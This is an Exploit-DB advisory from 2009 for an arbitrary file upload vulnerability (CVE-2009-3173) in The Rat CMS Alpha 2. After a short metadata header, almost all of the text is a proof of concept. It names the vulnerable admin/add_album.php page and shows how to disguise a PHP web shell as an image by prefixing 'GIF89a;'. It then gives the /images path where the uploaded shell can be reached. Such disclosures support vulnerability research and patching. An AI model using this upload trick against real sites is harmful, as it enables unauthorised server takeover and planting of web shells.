The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability

2009-09-09T00:00:00
ID EDB-ID:9599
Type exploitdb
Reporter Securitylab.ir
Modified 2009-09-09T00:00:00

Description

The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability. CVE-2009-3173. Webapps exploit for php platform

                                        
                                            ########################## Securitylab.ir ########################
# Application Info:
# Name: The Rat Cms
# Version: Alpha 2
# DL: http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Arbitrary File Upload Vulnerability
# Risk: High
#===========================================================
# http://site.com/[path]/admin/add_album.php
#
# choose shell
#
# shell.php include :
# GIF89a;
# <? your shell code ?>
#
# Your shell Upload Here :
# http://site.com/[Path]/images
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-09-09]